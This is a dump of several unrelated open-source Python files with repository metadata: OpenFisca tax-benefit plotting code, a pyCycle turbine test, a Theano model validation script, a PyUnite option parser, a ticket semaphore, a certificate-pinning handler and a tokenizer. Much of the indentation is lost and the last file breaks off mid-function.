self.main.composition.set_option('graph/export_dir', output_dir)
try:
self.mplwidget.print_figure( fname )
except Exception, e:
QMessageBox.critical(
self, _("Error when saving image"), str(e),
QMessageBox.Ok, QMessageBox.NoButton)
#------ OpenfiscaPluginMixin API ---------------------------------------------
#------ OpenfiscaPluginWidget API ---------------------------------------------
def get_plugin_title(self):
"""
Return plugin title
Note: after some thinking, it appears that using a method
is more flexible here than using a class attribute
"""
return _("Test case graphic")
def get_plugin_icon(self):
"""
Return plugin icon (QIcon instance)
Note: this is required for plugins creating a main window
(see OpenfiscaPluginMixin.create_mainwindow)
and for configuration dialog widgets creation
"""
return get_icon('OpenFisca22.png')
def get_plugin_actions(self):
"""
Return a list of actions related to plugin
Note: these actions will be enabled when plugin's dockwidget is visible
and they will be disabled when it's hidden
"""
self.save_action = create_action(
self, _("Save &graph"),
icon = 'filesave.png',
tip = _("Save test case graph"),
triggered = self.save_figure
)
self.register_shortcut(
self.save_action,
context = "Graph",
name =_("Save test case graph"),
default = "Ctrl+G"
)
self.file_menu_actions = [self.save_action]
self.main.file_menu_actions += self.file_menu_actions
return self.file_menu_actions
def register_plugin(self):
"""
Register plugin in OpenFisca's main window
"""
self.main.add_dockwidget(self)
def refresh_plugin(self):
'''
Update Graph
'''
self.updateGraph(self.main.scenario)
def closing_plugin(self, cancelable=False):
"""
Perform actions before parent main window is closed
Return True or False whether the plugin may be closed immediately or not
Note: returned value is ignored if *cancelable* is False
"""
return True
def draw_simulation_bareme(simulation, ax, graph_x_axis = None, legend = False,
                           position = 1, currency = None):
    """
    Draws a bareme on matplotlib.axes.Axes
    """
    reforme = simulation.reforme
    alter = (simulation.alternative_scenario is not None)
    # NOTE: `currency` must be supplied by the caller (e.g. from
    # main.tax_benefit_system.CURRENCY); this module-level function has no `self`.
    simulation.compute()
    data = simulation.data
    data_default = simulation.data_default
    data.setLeavesVisible()
    data_default.setLeavesVisible()
    if graph_x_axis is None:
        graph_x_axis = 'sal'
    if not alter:
        drawBareme(data, ax, graph_x_axis, reforme, data_default, legend, currency = currency)
    else:
        drawBaremeCompareHouseholds(data, ax, graph_x_axis, data_default, legend, currency = currency, position = position)
def draw_simulation_taux(simulation, ax, graph_x_axis = None, legend = True):
"""
Draws a bareme on matplotlib.axes.Axes object ax
"""
reforme = simulation.reforme or (simulation.alternative_scenario is not None)
simulation.compute()
data, data_default = simulation.data, simulation.data_default
data.setLeavesVisible()
data_default.setLeavesVisible()
if graph_x_axis is None:
graph_x_axis = 'sal'
drawTaux(data, ax, graph_x_axis, reforme, data_default, legend = legend)
def draw_simulation_waterfall(simulation, ax):
"""
Draws a waterfall on matplotlib.axes.Axes object ax
"""
data, data_default = simulation.compute()
del data_default
data.setLeavesVisible()
drawWaterfall(data, ax)
def drawWaterfall(data, ax, currency = None):
ax.figure.subplots_adjust(bottom = 0.15, right = 0.95, top = 0.95, left = 0.1)
barwidth = 0.8
number = [0]
patches = []
codes = []
shortnames = []
def drawNode(node, prv):
prev = prv + 0
val = node.vals[0]
bot = prev
for child in node.children:
drawNode(child, prev)
prev += child.vals[0]
if (val != 0) and node.visible:
r, g, b = node.color
arrow = FancyArrow(
number[0] + barwidth / 2, bot, 0, val,
width = barwidth,
fc = (r / 255, g / 255, b / 255), linewidth = 0.5, edgecolor = 'black',
label = node.desc, picker = True, length_includes_head = True,
head_width = barwidth,
head_length = abs(val / 15),
)
arrow.top = bot + max(0, val)
arrow.absci = number[0] + 0
# a = Rectangle((number[0], bot), barwidth, val, fc = node.color, linewidth = 0.5, edgecolor = 'black', label = node.desc, picker = True)
arrow.value = round(val)
patches.append(arrow)
codes.append(node.code)
shortnames.append(node.shortname)
number[0] += 1
prv = 0
drawNode(data, prv)
for patch in patches:
ax.add_patch(patch)
n = len(patches)
abscisses = np.arange(n)
xlim = (- barwidth * 0.5, n - 1 + barwidth * 1.5)
ax.hold(True)
ax.plot(xlim, [0, 0], color = 'black')
ax.set_xticklabels(shortnames, rotation = '45')
ax.set_xticks(abscisses + barwidth / 2)
ax.set_xlim((-barwidth / 2, n - 1 + barwidth * 1.5))
ticks = ax.get_xticklines()
for tick in ticks:
tick.set_visible(False)
for rect in patches:
x = rect.absci
y = rect.top
val = u'{} {}'.format(int(rect.value), currency)
width = barwidth
if rect.value >= 0:
col = 'black'
else:
col = 'red'
ax.text(x + width / 2, y + 1, val, horizontalalignment = 'center',
verticalalignment = 'bottom', color= col, weight = 'bold')
m, M = ax.get_ylim()
ax.set_ylim((m, 1.05 * M))
def drawBareme(data, axes, x_axis, reform = False, reference_data = None,
legend = True, currency = None, legend_position = 2):
'''
Draws bareme
'''
if reference_data is None:
reference_data = data
axes.figure.subplots_adjust(bottom = 0.09, top = 0.95, left = 0.11, right = 0.95)
if reform:
prefix = 'Variation '
else:
prefix = ''
axes.hold(True)
x_axis_data = reference_data[x_axis]
n_points = len(x_axis_data.vals)
xlabel = x_axis_data.desc
axes.set_xlabel(xlabel)
axes.set_ylabel(prefix + u"{} ({} par an)".format(data.code, currency))
axes.set_xlim(np.amin(x_axis_data.vals), np.amax(x_axis_data.vals))
if not reform:
axes.set_ylim(np.amin(x_axis_data.vals), np.amax(x_axis_data.vals))
axes.plot(x_axis_data.vals, np.zeros(n_points), color = 'black', label = 'x_axis')
def drawNode(node, prv):
prev = prv + 0
if np.any(node.vals != 0) and node.visible:
r, g, b = node.color
col = (r / 255, g / 255, b / 255)
if node.typevar == 2:
a = axes.plot(
x_axis_data.vals,
node.vals,
color = col,
linewidth = 2,
label = prefix + node.desc,
)
else:
a = axes.fill_between(
x_axis_data.vals,
prev + node.vals,
prev,
color = col,
linewidth = 0.2,
edgecolor = 'black',
picker = True,
)
a.set_label(prefix + node.desc)
for child in node.children:
drawNode(child, prev)
prev += child.vals
prv = np.zeros(n_points)
drawNode(data, prv)
if legend:
createLegend(axes, position = legend_position)
def drawBaremeCompareHouseholds(data, ax, x_axis, dataDefault = None, legend = True, currency = "", position = 2):
'''
Draws bareme
'''
if dataDefault is None:
        raise Exception('drawBaremeCompareHouseholds: dataDefault must be defined')
ax.figure.subplots_adjust(bottom = 0.09, top = 0.95, left = 0.11, right = 0.95)
prefix = 'Variation '
ax.hold(True)
xdata = dataDefault[x_axis]
NMEN = len(xdata.vals)
xlabel = xdata.desc
ax.set_xlabel(xlabel)
ax.set_ylabel(prefix + u"Revenu disponible (" + currency + " par an)")
ax.set_xlim(np.amin(xdata.vals), np.amax(xdata.vals))
ax.plot(xdata.vals, np.zeros(NMEN), color = 'black', label = 'x_axis')
code_list = ['af', 'cf', 'ars', 'rsa', 'aefa', 'psa', 'logt', 'irpp', 'ppe', 'revdisp']
def drawNode(node, prv):
minimum = 0
maximum = 0
prev = prv + 0
# if np.any(node.vals != 0) and node.visible and node.code != 'root' and node.code in code_list:
if np.any(node.vals != 0) and node.code != 'root' and node.code in code_list:
node.visible = True
r, g, b = node.color
col = (r / 255, g / 255, b / 255)
if node.typevar == 2:
a = ax.plot(xdata.vals, node.vals, color = col, linewidth = 2, label = prefix + node.desc)
else:
a = ax.fill_between(xdata.vals, prev + node.vals, prev, color = col, linewidth = 0.2,
edgecolor = 'black', picker = True)
a.set_label(prefix + node.desc)
for child in node.children:
drawNode(child, prev)
prev += child.vals
minimum = min([np.amin(prev), minimum])
maximum = max([np.amax(prev), maximum])
return minimum, maximum * 1.1
prv = np.zeros(NMEN)
minimum, maximum = drawNode(data, prv)
ax.set_ylim(minimum, maximum)
if legend:
createLegend(ax, position = position)
def drawBaremeCompareHouseholds2(data, ax, x_axis, dataDefault = None, legend = True, currency = "", position = 2):
'''
Draws bareme
'''
if dataDefault is None:
        raise Exception('drawBaremeCompareHouseholds2: dataDefault must be defined')
ax.figure.subplots_adjust(bottom = 0.09, top = 0.95, left = 0.11, right = 0.95)
prefix = 'Variation '
ax.hold(True)
xdata = dataDefault[x_axis]
NMEN = len(xdata.vals)
xlabel = xdata.desc
ax.set_xlabel(xlabel)
ax.set_ylabel(prefix + u"Revenu disponible (" + currency + " par an)")
ax.set_xlim(np.amin(xdata.vals), np.amax(xdata.vals))
ax.plot(xdata.vals, np.zeros(NMEN), color = 'black', label = 'x_axis')
node_list = ['af', 'cf', 'ars', 'rsa', 'aefa', 'psa', 'logt', 'irpp', 'ppe', 'revdisp']
prv = np.zeros(NMEN)
for nod in node_list:
node = data[nod]
prev = prv + 0
r, g, b = node.color
col = (r / 255, g / 255, b / 255)
if node.typevar == 2:
a = ax.plot(xdata.vals, node.vals, color = col, linewidth = 2, label = prefix + node.desc)
else:
a = ax.fill_between(xdata.vals, prev + node.vals, prev, color = col, linewidth = 0.2,
edgecolor = 'black', picker = True)
a.set_label(prefix + node.desc)
prv += node.vals
if legend:
createLegend(ax, position = position)
def percentFormatter(x, pos=0):
return '%1.0f%%' % (x)
def drawTaux(data, ax, x_axis, reforme = False, dataDefault = None, legend = True):
'''
Draws marginal and average tax rates
'''
if dataDefault is None:
dataDefault = data
print "x_axis :", x_axis
# TODO: the following is an ugly fix which is not general enough
if x_axis == "rev_cap_brut":
typ_rev = 'superbrut'
elif x_axis == "rev_cap_net":
typ_rev = 'net'
elif x_axis == "fon":
typ_rev = 'brut'
else:
for typrev, vars in model.REVENUES_CATEGORIES.iteritems():
if x_axis in vars:
typ_rev = typrev
RB = RevTot(dataDefault, typ_rev)
xdata = dataDefault[x_axis]
RD = dataDefault['revdisp'].vals
div = RB*(RB != 0) + (RB == 0)
taumoy = (1 - RD / div) * 100
taumar = 100 * (1 - (RD[:-1]-RD[1:]) / (RB[:-1]-RB[1:]))
ax.hold(True)
ax.set_xlim(np.amin(xdata.vals), np.amax(xdata.vals))
ax.set_ylabel(r"$\left(1 - \frac{RevDisponible}{RevInitial} \right)\ et\ \left(1 - \frac{d (RevDisponible)}{d (RevInitial)}\right)$")
ax.set_ylabel(r"$\left(1 - \frac{RevDisponible}{RevInitial} \right)\ et\ \left(1 - \frac{d (RevDisponible)}{d (RevInitial)}\right)$")
ax.plot(xdata.vals, taumoy, label = u"Taux moyen d'imposition", linewidth = 2)
ax.plot(xdata.vals[1:], taumar, label = u"Taux marginal d'imposition", linewidth = 2)
ax.set_ylim(0,100)
ax.yaxis.set_major_formatter(FuncFormatter(percentFormatter))
if legend:
createLegend(ax)
def createLegend(ax, position = 2):
'''
Creates legend
'''
p = []
l = []
for collec in ax.collections:
if collec._visible:
p.insert(0, Rectangle((0, 0), 1, 1, fc = collec._facecolors[0], linewidth = 0.5, edgecolor = 'black' ))
l.insert(0, collec._label)
for line in ax.lines:
if line._visible and (line._label != 'x_axis'):
p.insert(0, Line2D([0,1],[.5,.5],color = line._color))
l.insert(0, line._label)
ax.legend(p,l, loc= position, prop = {'size':'medium'})
def RevTot(data, typrev):
'''
    Computes total revenues by type; the definition is country-specific.
'''
dct = model.REVENUES_CATEGORIES
first = True
try:
for var in dct[typrev]:
if first:
                out = data[var].vals.copy() # WARNING: copy is needed to avoid aliasing problems (do not remove this line)!
first = False
else:
out += data[var].vals
return out
except:
raise Exception("typrev is %s but typrev should be one of the following: %s" %(str(typrev), str(dct.keys())) )
|
agpl-3.0
| -2,987,348,892,159,805,400
| 33.338918
| 148
| 0.576875
| false
| 3.673928
| false
| false
| false
|
JustinSGray/pyCycle
|
pycycle/elements/test/test_turbine_od.py
|
1
|
7060
|
import numpy as np
import unittest
import os
from openmdao.api import Problem, Group
from openmdao.utils.assert_utils import assert_near_equal
from pycycle.mp_cycle import Cycle
from pycycle.thermo.cea.species_data import janaf
from pycycle.elements.turbine import Turbine
from pycycle.elements.combustor import Combustor
from pycycle.elements.flow_start import FlowStart
from pycycle.maps.lpt2269 import LPT2269
fpath = os.path.dirname(os.path.realpath(__file__))
ref_data = np.loadtxt(fpath + "/reg_data/turbineOD1.csv",
delimiter=",", skiprows=1)
header = [
'turb.PRdes',
'turb.effDes',
'shaft.Nmech',
'burn.FAR',
'burn.Fl_I.W',
'burn.Fl_I.Pt',
'burn.Fl_I.Tt',
'burn.Fl_I.ht',
'burn.Fl_I.s',
'burn.Fl_I.MN',
'burn.Fl_I.V',
'burn.Fl_I.A',
'burn.Fl_I.Ps',
'burn.Fl_I.Ts',
'burn.Fl_I.hs',
'turb.Fl_I.W',
'turb.Fl_I.Pt',
'turb.Fl_I.Tt',
'turb.Fl_I.ht',
'turb.Fl_I.s',
'turb.Fl_I.MN',
'turb.Fl_I.V',
'turb.Fl_I.A',
'turb.Fl_I.Ps',
'turb.Fl_I.Ts',
'turb.Fl_I.hs',
'turb.Fl_O.W',
'turb.Fl_O.Pt',
'turb.Fl_O.Tt',
'turb.Fl_O.ht',
'turb.Fl_O.s',
'turb.Fl_O.MN',
'turb.Fl_O.V',
'turb.Fl_O.A',
'turb.Fl_O.Ps',
'turb.Fl_O.Ts',
'turb.Fl_O.hs',
'turb.PR',
'turb.eff',
'turb.Np',
'turb.Wp',
'turb.pwr',
'turb.PRmap',
'turb.effMap',
'turb.NpMap',
'turb.WpMap',
'turb.s_WpDes',
'turb.s_PRdes',
'turb.s_effDes',
'turb.s_NpDes']
h_map = dict(((v_name, i) for i, v_name in enumerate(header)))
class TurbineODTestCase(unittest.TestCase):
def setUp(self):
self.prob = Problem()
cycle = self.prob.model = Cycle()
cycle.options['thermo_method'] = 'CEA'
cycle.options['thermo_data'] = janaf
cycle.options['design'] = False
cycle.add_subsystem('flow_start', FlowStart())
cycle.add_subsystem('burner', Combustor(fuel_type="JP-7"))
cycle.add_subsystem('turbine', Turbine( map_data=LPT2269))
cycle.set_input_defaults('burner.Fl_I:FAR', .01, units=None)
        cycle.set_input_defaults('turbine.Nmech', 1000., units='rpm')
        cycle.set_input_defaults('flow_start.P', 17., units='psi')
        cycle.set_input_defaults('flow_start.T', 500.0, units='degR')
        cycle.set_input_defaults('flow_start.W', 0., units='lbm/s')
cycle.set_input_defaults('turbine.area', 150., units='inch**2')
cycle.pyc_connect_flow("flow_start.Fl_O", "burner.Fl_I")
cycle.pyc_connect_flow("burner.Fl_O", "turbine.Fl_I")
self.prob.set_solver_print(level=-1)
self.prob.setup(check=False)
def test_case1(self):
# 6 cases to check against
for i, data in enumerate(ref_data):
# input turbine variables
self.prob['turbine.s_Wp'] = data[h_map['turb.s_WpDes']]
self.prob['turbine.s_eff'] = data[h_map['turb.s_effDes']]
self.prob['turbine.s_PR'] = data[h_map['turb.s_PRdes']]
self.prob['turbine.s_Np'] = data[h_map['turb.s_NpDes']]
self.prob['turbine.map.NpMap']= data[h_map['turb.NpMap']]
self.prob['turbine.map.PRmap']= data[h_map['turb.PRmap']]
# input flowstation variables
self.prob['flow_start.P'] = data[h_map['burn.Fl_I.Pt']]
self.prob['flow_start.T'] = data[h_map['burn.Fl_I.Tt']]
self.prob['flow_start.W'] = data[h_map['burn.Fl_I.W']]
self.prob['turbine.PR'] = data[h_map['turb.PR']]
# input shaft variable
self.prob['turbine.Nmech'] = data[h_map['shaft.Nmech']]
# input burner variable
self.prob['burner.Fl_I:FAR'] = data[h_map['burn.FAR']]
self.prob['turbine.area'] = data[h_map['turb.Fl_O.A']]
self.prob.run_model()
print('---- Test Case', i, ' ----')
print("corrParams --")
print("Wp", self.prob['turbine.Wp'][0], data[h_map['turb.Wp']])
print("Np", self.prob['turbine.Np'][0], data[h_map['turb.Np']])
print("flowConv---")
print("PR ", self.prob['turbine.PR'][0], data[h_map['turb.PR']])
print("mapInputs---")
print("NpMap", self.prob['turbine.map.readMap.NpMap'][0], data[h_map['turb.NpMap']])
print("PRmap", self.prob['turbine.map.readMap.PRmap'][0], data[h_map['turb.PRmap']])
print("readMap --")
print(
"effMap",
self.prob['turbine.map.scaledOutput.effMap'][0],
data[
h_map['turb.effMap']])
print(
"WpMap",
self.prob['turbine.map.scaledOutput.WpMap'][0],
data[
h_map['turb.WpMap']])
print("Scaled output --")
print("eff", self.prob['turbine.eff'][0], data[h_map['turb.eff']])
tol = 1.0e-3
print()
npss = data[h_map['burn.Fl_I.Pt']]
pyc = self.prob['flow_start.Fl_O:tot:P'][0]
print('Pt in:', npss, pyc)
assert_near_equal(pyc, npss, tol)
npss = data[h_map['burn.Fl_I.s']]
pyc = self.prob['flow_start.Fl_O:tot:S'][0]
print('S in:', npss, pyc)
assert_near_equal(pyc, npss, tol)
npss = data[h_map['turb.Fl_O.W']]
pyc = self.prob['turbine.Fl_O:stat:W'][0]
print('W in:', npss, pyc)
assert_near_equal(pyc, npss, tol)
npss = data[h_map['turb.Fl_O.ht']] - data[h_map['turb.Fl_I.ht']]
pyc = self.prob['turbine.Fl_O:tot:h'][0] - self.prob['burner.Fl_O:tot:h'][0]
print('delta h:', npss, pyc)
assert_near_equal(pyc, npss, tol)
npss = data[h_map['turb.Fl_I.s']]
pyc = self.prob['burner.Fl_O:tot:S'][0]
print('S in:', npss, pyc)
assert_near_equal(pyc, npss, tol)
npss = data[h_map['turb.Fl_O.s']]
pyc = self.prob['turbine.Fl_O:tot:S'][0]
print('S out:', npss, pyc)
assert_near_equal(pyc, npss, tol)
npss = data[h_map['turb.pwr']]
pyc = self.prob['turbine.power'][0]
print('Power:', npss, pyc)
assert_near_equal(pyc, npss, tol)
npss = data[h_map['turb.Fl_O.Pt']]
pyc = self.prob['turbine.Fl_O:tot:P'][0]
print('Pt out:', npss, pyc)
assert_near_equal(pyc, npss, tol)
# these fail downstream of combustor
npss = data[h_map['turb.Fl_O.Ps']]
pyc = self.prob['turbine.Fl_O:stat:P'][0]
print('Ps out:', npss, pyc)
assert_near_equal(pyc, npss, tol)
npss = data[h_map['turb.Fl_O.Ts']]
pyc = self.prob['turbine.Fl_O:stat:T'][0]
print('Ts out:', npss, pyc)
assert_near_equal(pyc, npss, tol)
print("")
print()
if __name__ == "__main__":
unittest.main()
|
apache-2.0
| 5,855,211,299,384,399,000
| 31.534562
| 96
| 0.525779
| false
| 2.904155
| true
| false
| false
|
Superjom/NeuralNetworks
|
apps/126/validate.py
|
1
|
4599
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Created on March 3, 2014
@author: Chunwei Yan @ PKU
@mail: yanchunwei@outlook.com
'''
from __future__ import division
import sys
import theano
import math
import numpy
from theano import scalar as T
import cPickle as pickle
import argparse
sys.path.append('../..')
from models.stacked_autoencoder import StackedAutoEncoder
from dataset import Dataset as DenoDataset
def load_dataset(dataset_ph):
'''
test if the file in pickle format
predict if the file in csv format
'''
if dataset_ph.endswith('.pk'):
with open(dataset_ph) as f:
dataset = pickle.load(f)
else:
print '!!\tdataset is in csv format'
print '!!!\tattention: validator will ignore the first line'
deno_dataset = DenoDataset(dataset_ph)
records = deno_dataset.load_records_to_norm_float()
dataset = (records, None)
return dataset
def load_model(path):
'''
load pretrained StackedAutoencoder object from a file
'''
with open(path, 'rb') as f:
model = pickle.load(f)
return model
class Validator(object):
'''
given some records and predict label
'''
def __init__(self, dataset, model):
self.dataset = dataset
self.model = model
self._init()
def _init(self):
try:
train_fn, self.predict_fn = self.model.compile_finetune_funcs()
except:
self.predict_fn = self.model.compile_predict_fn()
def predict(self):
res = []
records,labels = self.dataset
n_records = records.shape[0]
for i in range(n_records):
x = records[i:i+1]
#print 'x:', x
y = self.predict_fn(x)[0]
#print 'y:', y, labels[i]
res.append(y)
return res
def batch_predict(self):
'''
predict by batch
'''
records,labels = self.dataset
n_records = records.shape[0]
batch_size = 40
n_batches = int(math.ceil(n_records/batch_size))
res = []
for i in xrange(n_batches):
x = records[i*batch_size:(i+1) * batch_size]
#print 'x', x
# to fix a bug
x_size = x.shape[0]
if x_size < batch_size:
#print 'x_size < batch_size', x_size, batch_size
x = records[-batch_size:]
y_preds = self.predict_fn(x)[0]
y_preds = y_preds[-x_size:]
else:
y_preds = self.predict_fn(x)[0]
#print 'y_preds', y_preds
for y in y_preds:
res.append(y)
#res.append(y_preds)
return res
def validate(self):
records,labels = self.dataset
labels = list(labels)
n_records = records.shape[0]
#res = self.batch_predict()
res = self.predict()
#print 'predict res', res
num = 0
#print 'labels', labels
print 'len res labels', len(res), len(labels)
for i in xrange(n_records):
if res[i] == labels[i]:
num += 1.0
#num = len(filter(lambda x:x, res == labels))
#print 'num', num
c_rate = num/n_records
print 'Correct rate:', c_rate
print 'Error rate:', 1 - c_rate
return c_rate
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description = "predict and validate")
parser.add_argument('-d', action='store',
dest='dataset_ph', help='path to dataset'
)
parser.add_argument('-t', action='store',
dest='task', help='task: validate or predict',
)
parser.add_argument('-m', action='store',
dest='model_ph', help='path of model file',
)
parser.add_argument('-f', action='store',
dest='topath', help='path of output file'
)
if len(sys.argv) == 1:
parser.print_help()
exit(-1)
args = parser.parse_args()
dataset = load_dataset(args.dataset_ph)
model = load_model(args.model_ph)
validator = Validator(
dataset = dataset,
model = model,
)
# task
if args.task == 'predict':
res = validator.batch_predict()
print 'predict %d labels' % len(res)
with open(args.topath, 'w') as f:
f.write(
'\n'.join([str(s) for s in res]))
elif args.task == 'validate':
validator.validate()
else:
print 'unrecognized task: "%s"' % args.task
# TODO to file?
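# Example invocations (all paths are placeholders):
#   python validate.py -t validate -d test_set.pk -m model.pk
#   python validate.py -t predict -d records.csv -m model.pk -f labels.txt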
|
apache-2.0
| -510,086,034,167,619,840
| 25.738372
| 75
| 0.543379
| false
| 3.720874
| false
| false
| false
|
azure-satellite/pyunite
|
pyunite/option.py
|
1
|
3196
|
import re
from itertools import imap
from collections import namedtuple
import funcy as fn
option = namedtuple('option', ['name', 'value'])
# Options can be specified in the PyUnite command line. They are merged into a
# state that uniquely identifies a PyUnite buffer.
default_options = dict(
# Scope of a PyUnite buffer:
# - global: Buffer is global. The quickfix list behaves like this.
# - tabpage: Buffer is tab local.
# - window: Buffer is window local. The location list behaves like this.
# Notice that there could actually be more than one PyUnite buffer per
# scope if other PyUnite buffers in the same scope are marked as
# replaceable.
scope='tabpage',
# Whether to quit if another PyUnite in the same scope is being opened
replace=True,
# Height if horizontal split. Width if vertical split. Zero means don't
# resize the window.
size=0,
# Split vertically instead of horizontally
vsplit=False,
# Direction of the window split. See
# https://technotales.wordpress.com/2010/04/29/vim-splits-a-guide-to-doing-exactly-what-you-want/
direction='leftabove',
# Don't open window when there are no candidates
close_on_empty=False,
# Steal focus from current window
focus_on_open=False,
# Close window after performing an action on a candidate
close_on_action=False,
# Leave window after performing an action on a candidate
leave_on_action=False,
)
class Option(object):
def __init__(self, name, value):
self.name = name
self.value = value
        original_name = '-' + re.sub('_', '-', name)
        error_msg = 'Option "{}" is not recognized'.format(original_name)
assert name in default_options, error_msg
expected_type = type(default_options[name])
error_msg = 'Expected value of {} for option "{}"'.format(str(expected_type), original_name)
assert type(value) == expected_type, error_msg
if name == 'scope':
scopes = ['global', 'tabpage', 'window']
error = 'Option "-scope" has to be one of {}'.format(str(scopes))
assert value in scopes, error
if name == 'direction':
directions = ['topleft', 'botright', 'leftabove', 'rightbelow']
error = 'Option "-direction" has to be one of {}'.format(str(directions))
assert value in directions, error
def format_option(self):
name = re.sub('_', '-', self.name)
if isinstance(default_options[self.name], bool):
if self.value:
return '-{}'.format(name)
else:
return '-no-{}'.format(name)
else:
            return '-{}={}'.format(name, self.value)
    def format(self):
        ''' Command-line spelling of this option's name '''
        return '-' + re.sub('_', '-', self.name)
def parse_option(string):
if '=' not in string:
string += '='
name, value = re.split('=', string)
if value == '':
value = False if name.startswith('-no-') else True
else:
value = fn.silent(eval)(value) or value
name = re.sub('-', '_', re.sub('^(-no-|-)', '', name))
return Option(name=name, value=value)
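# parse_option examples (numeric values go through eval()):
#   parse_option('-size=10')    -> Option(name='size', value=10)
#   parse_option('-vsplit')     -> Option(name='vsplit', value=True)
#   parse_option('-no-replace') -> Option(name='replace', value=False)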
def format_options(options):
    return fn.iflatten(imap(Option.format_option, options))
|
bsd-3-clause
| 6,447,050,693,128,628,000
| 35.318182
| 102
| 0.623279
| false
| 3.950556
| false
| false
| false
|
Saevon/Recipes
|
python/ticket_semaphore.py
|
1
|
2045
|
import contextlib
import multiprocessing
import time
import ctypes
class Ticket():
''' A ticket from a TicketSemaphore '''
def __init__(self, ticketer, size):
self.size = size
self.ticketer = ticketer
def release(self, *args, **kwargs):
''' Releases this ticket from the owning ticketer '''
self.ticketer.release(self, *args, **kwargs)
class TicketSemaphore():
'''
Semaphore that allows grabbing different size of product
ticketer = TicketSemaphore(10)
ticket = ticketer.acquire(3)
ticket.release()
with ticketer(size=3):
pass
'''
    def __init__(self, size):
        # Shared counter of remaining capacity, guarded by the condition below
        self.available = multiprocessing.Value(ctypes.c_int, size)
        self.size = size
        self.lock = multiprocessing.Condition()
    def acquire(self, timeout=None, size=1):
        ''' Grabs a ticket of the given size '''
        time_left = None
        if timeout:
            start = time.time()
            time_left = timeout
        if not self.lock.acquire(timeout=time_left):
            # Could not get the condition's lock in time
            return False
        try:
            # Wait until there is enough space
            while self.available.value < size:
                if timeout:
                    time_left = timeout - (time.time() - start)
                    if time_left <= 0:
                        # We've run out of time
                        return False
                self.lock.wait(timeout=time_left)
            # The ticket is ours!
            self.available.value -= size
            return Ticket(self, size)
        finally:
            self.lock.release()
    def release(self, ticket):
        ''' Releases the given ticket '''
        with self.lock:
            self.available.value += ticket.size
            if self.available.value > self.size:
                raise OverflowError("Too many tickets returned")
            # Wake up any waiters so they can re-check the available space
            self.lock.notify_all()
    def __call__(self, **kwargs):
        ''' ContextManager with arguments '''
        @contextlib.contextmanager
        def with_ticket_lock():
            ticket = None
            try:
                ticket = self.acquire(**kwargs)
                yield ticket
            finally:
                if ticket:
                    ticket.release()
        return with_ticket_lock()
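if __name__ == '__main__':
    # Minimal single-process sanity check: capacity 10, take a ticket of
    # size 3, hand it back, then do the same via the context-manager form.
    ticketer = TicketSemaphore(10)
    ticket = ticketer.acquire(size=3)
    assert ticketer.available.value == 7
    ticket.release()
    assert ticketer.available.value == 10
    with ticketer(size=3):
        assert ticketer.available.value == 7
    assert ticketer.available.value == 10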
|
mit
| -3,672,569,619,838,448,000
| 24.5625
| 64
| 0.556479
| false
| 4.514349
| false
| false
| false
|
alvarofe/cassle
|
handlers/pin.py
|
1
|
1816
|
from handlers import handlers
from handlers import handler
from conf import config, debug_logger
from handlers.base import BaseHandler
from db.database import PinDB
import logging
from notification.event_notification import MITMNotification
import base64
logger = logging.getLogger(__name__)
#TODO rewrite this handler to do it properly
@handler(handlers, isHandler=config.V_PINNING)
class Pinning(BaseHandler):
name = "pinning"
def __init__(self, cert, ocsp):
super(Pinning, self).__init__(cert, ocsp)
self.on_certificate(cert)
def on_certificate(self, cert):
name = cert.subject_common_name()
issuer_name = cert.issuer_common_name()
query = db.get(name)
if query is None:
debug_logger.debug(
"\t[-] You have not pinned this certificate %s" % name)
return
try:
spki = cert.hash_spki(deep=1, algorithm="sha256")
spki = base64.b64encode(spki)
except:
logger.error("Getting spki of the intermediate CA %s" % name)
return
try:
issuers = query["issuers"]
for i in issuers[issuer_name]:
if spki == i:
debug_logger.debug("\t[+] pin correct %s " % name)
return
logger.info("\t[-] Pin does not match %s" % name)
debug_logger.debug("\t[-] Pin does not match %s" % name)
MITMNotification.notify(
title="Pinning",
message=cert.subject_common_name())
except:
MITMNotification.notify(
title="Pinning",
message="Issuer different")
debug_logger.debug("\t[-] issuer with different name %s" % name)
db = PinDB(config.DB_NAME, "pinning")
|
gpl-3.0
| -4,842,815,281,196,532,000
| 29.779661
| 76
| 0.5837
| false
| 3.939262
| false
| false
| false
|
kcarnold/counterfactual-lm
|
code/tokenization.py
|
1
|
2976
|
import re
import string
from nltk.tokenize import RegexpTokenizer, PunktSentenceTokenizer
WORD_RE = re.compile(r'\w+(?:[\',:]\w+)*')
END_PUNCT = set('.,?!:')
def token_spans(text):
for match in re.finditer(r'[^-/\s]+', text):
start, end = match.span()
token_match = WORD_RE.search(text, start, end)
if token_match is not None:
span = token_match.span()
yield span
tok_end = span[1]
if tok_end < end and text[tok_end] in END_PUNCT:
yield tok_end, tok_end + 1
START_DOC = '<D>'
START_PARA = '<P>'
START_SENT = '<S>'
END_SENT = '</S>'
paragraph_re = re.compile(r'(?:[ ]*[^\s][^\n]*[\n]?)+')
paragraph_tokenizer = RegexpTokenizer(paragraph_re)
sentence_tokenizer = PunktSentenceTokenizer()
def tokenize(doc):
res = [START_DOC]
afters = []
end_of_prev_para = 0
for para_start, para_end in paragraph_tokenizer.span_tokenize(doc):
afters.append(doc[end_of_prev_para:para_start])
para = doc[para_start:para_end]
end_of_prev_para = para_end
end_of_prev_sentence = 0
res.append(START_PARA)
for sent_start, sent_end in sentence_tokenizer.span_tokenize(para):
sent = para[sent_start:sent_end]
tspans = list(token_spans(sent))
if not tspans:
continue
afters.append(para[end_of_prev_sentence:sent_start])
end_of_prev_sentence = sent_end
res.append(START_SENT)
end_of_prev_token = 0
for tok_start, tok_end in tspans:
afters.append(sent[end_of_prev_token:tok_start])
res.append(sent[tok_start:tok_end])
end_of_prev_token = tok_end
res.append(END_SENT)
afters.append(sent[end_of_prev_token:])
end_of_prev_para -= len(para) - end_of_prev_sentence
afters.append(doc[end_of_prev_para:])
return res, afters
def tokenize_mid_document(doc_so_far):
if len(doc_so_far.strip()) == 0:
return [START_DOC, START_PARA, START_SENT, ''], ['', '', '', '']
tok_list, afters = tokenize(doc_so_far)
if doc_so_far.endswith('\n\n'):
# starting a new paragraph
if tok_list[-1] in [START_PARA, START_SENT]:
print("Huh? Ended with double-newlines but also with start-of-para?", repr(tok_list[-5:]))
tok_list += [START_PARA, START_SENT, '']
afters += ['', '', '']
else:
assert tok_list[-1] == END_SENT
if tok_list[-2] in '.?!':
# Real EOS
tok_list += [START_SENT, '']
afters += ['', '']
elif doc_so_far[-1] in string.whitespace:
# The last EOS was spurious, but we're not mid-word.
tok_list[-1] = ""
else:
